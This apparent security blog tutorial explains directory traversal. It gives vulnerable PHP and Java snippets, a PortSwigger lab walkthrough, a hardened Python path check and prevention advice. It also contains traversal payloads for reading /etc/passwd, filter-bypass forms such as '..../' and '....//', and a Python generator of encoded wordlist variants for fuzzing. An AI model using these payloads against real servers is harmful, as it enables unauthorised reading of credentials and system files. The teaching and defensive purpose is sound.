Mastering Directory Traversal: A Comprehensive Guide from Basics to Prevention

Directory Traversal vulnerability allows an attacker to access sensitive files or execute commands on the application server.


Medusa

8 mins

In 2018, a directory traversal vulnerability was discovered in the File Manager plugin for WordPress, which allowed attackers to upload and execute malicious files on vulnerable websites. The vulnerability was caused by a lack of sanitization of user input in the "path" parameter of the plugin's code, which allowed attackers to traverse the server's directory structure and upload or execute files outside of the intended directory. This vulnerability affected over 700,000 websites and highlights the importance of implementing proper input validation and sanitization in web applications to prevent directory traversal attacks.

This blog covers the following:

  • What is Directory Traversal?

  • How does directory traversal occur?

  • Examples

  • How to exploit it?

  • Prevention Measures

What is Directory Traversal?

Directory Traversal, also known as Path Traversal, is a vulnerability that lets an attacker read (and sometimes write) files and directories outside the folder the application meant to expose. It arises when an application builds a file path from user input without validating or canonicalising it, so sequences such as "../" in the input "traverse" up the server's directory tree. Reading alone exposes configuration files, source code and credentials; where the traversed path is written to or included as code, it can escalate to command execution on the server. Web developers must validate the input and, above all, verify where the resolved path points before touching the file system.

Here are two examples of code vulnerable to Directory Traversal:

PHP Vulnerable Code

<?php
// Vulnerable: the base directory is hardcoded, but the user-controlled "file"
// value is appended to it without any validation or canonicalisation.
$file = $_GET['file'];
include("/path/to/files/" . $file);
?>

This code takes a file name from the GET parameter "file" and includes that file in the PHP script. Only the base directory is hardcoded; the user-supplied name is appended to it unchanged, so the user decides where the resulting path points.

Java Vulnerable Code

import java.io.BufferedReader;
import java.io.File;
import java.io.FileReader;
import java.io.IOException;

// Reads the whole file at the given path and returns it as a string.
public static String readFile(String filename) throws IOException {
   File file = new File(filename);
   BufferedReader reader = new BufferedReader(new FileReader(file));
   String line = null;
   StringBuilder stringBuilder = new StringBuilder();
   String ls = System.getProperty("line.separator");
   while ((line = reader.readLine()) != null) {
      stringBuilder.append(line);
      stringBuilder.append(ls);
   }
   reader.close();
   return stringBuilder.toString();
}

// Directory Traversal vulnerability: the request parameter is appended to the
// base directory without validation or canonicalisation, so "../" segments in
// it walk out of /var/www/files/.
String filename = request.getParameter("filename");
String fileContent = readFile("/var/www/files/" + filename);

Both snippets are vulnerable for the same reason: user input is appended to a file path without being validated or canonicalised. The attacker supplies "../" segments to walk up the directory tree. If the PHP example's "file" parameter is set to "../../../../../etc/passwd", the script includes "/path/to/files/../../../../../etc/passwd"; the operating system resolves each ".." as a step to the parent directory, so the path collapses to "/etc/passwd" and its contents are returned. Supplying more "../" segments than strictly needed does no harm, because ".." at the root stays at the root, which is why attackers simply use a generous number. Note also that the PHP snippet uses include rather than a plain read, so any PHP code in the included file is executed: the same bug becomes code execution wherever the attacker can influence the contents of a file on the server.


Directory Traversal in API Endpoint

Here's an example of an HTTP request and response in an API endpoint vulnerable to directory traversal:

HTTP Request:

GET /api/files?file=../../../etc/passwd HTTP/1.1
Host: example.com

In this example, the attacker is attempting to access the sensitive file "passwd" by using "../" characters to traverse the server's directory structure.

HTTP Response:

HTTP/1.1 200 OK
Content-Type: text/plain

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

In this example, the server has responded with the contents of the "passwd" file, which contains sensitive information about the server's users.

Proper input validation prevents this, but not by merely searching the string for "../": filters of that kind are bypassed by URL encoding, backslashes and the non-recursive stripping trick shown in the lab below. The reliable fix is to build the path, canonicalise it, and confirm that the result still lies inside the intended directory, or better still, to have clients send an identifier that the server maps to a file name so that no user-controlled path exists at all.
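As an added example (not the page's own code, and written in Python rather than the page's PHP and Java), the block below puts the vulnerable concatenation from the snippets above beside two fixes: a canonicalise-and-contain check, and an identifier lookup in which the client never names a file. The base directory /var/www/files is taken from the Java snippet; the product table and payloads are constructed for illustration, and nothing is actually read from disk; the functions only decide which path would be opened.

```python
import os

# Assumed serving directory, mirroring readFile("/var/www/files/" + filename) above.
BASE_DIR = "/var/www/files"

# Constructed catalogue for the identifier-lookup fix: product id -> file name.
PRODUCT_IMAGES = {"36": "36.jpg", "37": "37.jpg"}


def vulnerable_path(user_input: str) -> str:
    """Vulnerable pattern: user input appended to a hardcoded base directory.
    Returns the path the OS would actually open once '..' segments are resolved
    (os.path.normpath performs that resolution lexically, without touching disk)."""
    return os.path.normpath(BASE_DIR + "/" + user_input)


def safe_path(user_input: str, base_dir: str = BASE_DIR) -> str:
    """Hardened: canonicalise, then require the result to stay under base_dir.

    realpath also follows symlinks, so a link inside base_dir that points outside
    is rejected as well. A failed check raises instead of returning None, so a
    caller cannot forget to test the result."""
    if "\x00" in user_input:
        raise ValueError("null byte in file name")
    base = os.path.realpath(base_dir)
    # os.path.join DISCARDS base when user_input is absolute ("/etc/passwd"),
    # which is exactly why the containment check must run on the final path.
    candidate = os.path.realpath(os.path.join(base, user_input))
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError(f"path escapes {base_dir}: {user_input!r}")
    return candidate


def is_allowed(user_input: str) -> bool:
    """True if safe_path() accepts user_input, False if it rejects it."""
    try:
        safe_path(user_input)
    except (PermissionError, ValueError):
        return False
    return True


def image_path_for_product(product_id: str) -> str:
    """Preferred fix: the client sends an identifier and the server maps it through
    a fixed table. The user never supplies a path, so there is nothing to traverse."""
    try:
        return os.path.join(BASE_DIR, PRODUCT_IMAGES[product_id])
    except KeyError:
        raise LookupError(f"unknown product {product_id!r}") from None


if __name__ == "__main__":
    payload = "../../../../../etc/passwd"
    print("vulnerable handler opens:", vulnerable_path(payload))
    print("hardened accepts 36.jpg:", is_allowed("36.jpg"))
    print("hardened accepts payload:", is_allowed(payload))
    print("hardened accepts absolute path:", is_allowed("/etc/passwd"))
    print("lookup for product 36:", image_path_for_product("36"))
```

The containment check is deliberately performed on the canonical path rather than on the raw input, so it does not matter how the traversal was spelled ("../", "....//", URL-encoded, or an absolute path): only where the path ends up counts. "sub/../36.jpg" is therefore accepted, because it resolves inside the base directory.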

Practical Demonstration

Target Application: PortSwigger Lab

The application is an e-commerce website that contains products and you can click on each product to see its details.

I’ve turned on Burp Proxy so it captures requests in the background. After browsing the shop and opening a few products, the proxy history in Burp Suite lists the requests made so far.

By default Burp's HTTP history filter hides image requests, so the product pictures do not appear in the list; enable images in the filter settings of the HTTP history tab to see them.

Select the request with the path /image?filename=36.jpg, which fetches the photo for one product. The filename parameter is the user-controlled value that the server turns into a file path.

To exploit it, send this request to Repeater and change the filename value to the payload ..../..../..../..../etc/passwd. The payload climbs the server's directory tree with traversal sequences and reaches a file outside the image directory, in this case /etc/passwd, which lists the server's user accounts.

You may be wondering why I didn't use "../../../etc/passwd". The application strips traversal sequences, but only once, in a single non-recursive pass, so I used four dots: when the backend removes ".." from "..../" the result is "../", which it then resolves as a normal step to the parent directory, and the traversal succeeds. Against a filter that removes the full sequence "../", the equivalent form is "....//"; in both cases the trick is that the characters left behind after one stripping pass reassemble into a fresh traversal sequence.

The response displays the contents of the /etc/passwd file, which should be kept confidential.

If an attacker can read /etc/passwd, they obtain the list of local accounts with their UIDs, home directories and login shells. On modern systems the password hashes live in /etc/shadow, which is normally readable only by root, but the usernames alone are enough for targeted brute-force and phishing, and the same traversal can be pointed at any other file the web server's account is allowed to read, such as application configuration files containing credentials.

In this case a simple payload was enough. If you are unsure which variant will get past the filter, fuzz the parameter instead: send the request to Intruder, mark the filename value as the payload position, and load a directory traversal wordlist as the payload set.

Several such wordlists are publicly available. Intruder, or any other fuzzing tool, then tries every variant, and sorting the responses by status code or length quickly shows which one returned the file.
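As an added example (not the lab's code), the block below models the filter behaviour described above and shows where the entries in a traversal wordlist come from. The strip_once filter, which removes "../" in a single pass and is therefore defeated by the "....//" form, is an assumption about how such a backend behaves; the author's "..../" payload relies on the same non-recursive property against a filter that strips "..". The target file and the payload forms are constructed for illustration.

```python
from urllib.parse import unquote

# Constructed target, as in the lab: the file the traversal aims at.
TARGET = "etc/passwd"


def strip_once(path: str) -> str:
    """Sanitizer that removes every '../' in one pass (non-recursive).
    Assumed model of the lab backend: removing the sequence once from '....//'
    leaves a fresh '../' behind, so the payload survives the filter."""
    return path.replace("../", "")


def strip_until_stable(path: str) -> str:
    """The same filter repeated until the string stops changing. This defeats the
    '....//' trick but is still a blocklist that knows nothing about URL encoding
    or backslashes, so it is only defence in depth, not the fix."""
    while True:
        stripped = path.replace("../", "")
        if stripped == path:
            return path
        path = stripped


def filter_then_decode(path: str) -> str:
    """Ordering bug: the filter runs on the raw parameter and URL-decoding happens
    afterwards (for instance in a lower layer). Encoded traversal passes untouched,
    and a double-encoded payload still has one layer left after a single decode."""
    return unquote(strip_once(path))


def payload_variants(depth: int, target: str = TARGET) -> dict:
    """The forms a traversal wordlist typically holds for one depth, keyed by the
    filter weakness each targets. depth is the number of directories to climb."""
    prefixes = {
        "plain": "../",
        "non_recursive_strip": "....//",
        "url_encoded": "%2e%2e%2f",
        "double_url_encoded": "%252e%252e%252f",
        "backslash": "..\\",
    }
    return {name: prefix * depth + target for name, prefix in prefixes.items()}


def wordlist(max_depth: int, target: str = TARGET) -> list:
    """Flatten the variants for depths 1..max_depth into an Intruder-style payload list."""
    return [p for d in range(1, max_depth + 1) for p in payload_variants(d, target).values()]


if __name__ == "__main__":
    bypass = payload_variants(3)["non_recursive_strip"]
    print("payload:", bypass)
    print("after strip_once:", strip_once(bypass))
    print("after strip_until_stable:", strip_until_stable(bypass))
    print("encoded payload after filter+decode:", filter_then_decode("%2e%2e%2f" * 3 + TARGET))
    for entry in wordlist(2):
        print(entry)
```

Each variant in the list targets a different mistake in the filter, which is why fuzzing with a wordlist is faster than guessing, and why none of these filters is a substitute for checking the canonical path against the intended directory.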

Prevention Measures

Here are some preventative measures that can be implemented to protect against directory traversal attacks:

  • Input validation: prefer an allowlist. Accept only file names that match a strict pattern (for example letters, digits and a fixed extension), or better, have the client send an identifier that the server maps to a file name. Where a path must be accepted, build it, canonicalise it (resolve "..", symlinks and encoding) and verify that the result still lies inside the intended directory. Searching the raw string for "../" is a blocklist that is defeated by encoding and by non-recursive stripping; treat it only as defence in depth.

  • File system permissions: run the application under a dedicated low-privilege account that can read only the files it must serve, so that even a successful traversal cannot reach /etc/shadow, configuration files or source code. A chroot or container file system narrows the reachable tree further.

  • Web server configuration: disable directory listing, serve static files from a dedicated document root, and do not let the application process open arbitrary paths on behalf of a request.

  • Use of frameworks and libraries: use the framework's own safe file-serving helpers rather than concatenating paths yourself; such helpers typically canonicalise the path and check that it stays inside the configured directory.

  • Regular updates and patches: keep the platform, frameworks and plugins current so that published traversal bugs in third-party code, such as the WordPress plugin case at the start of this post, are closed promptly.

By implementing these prevention measures, organizations can effectively protect against directory traversal attacks and ensure the security of their systems and data.
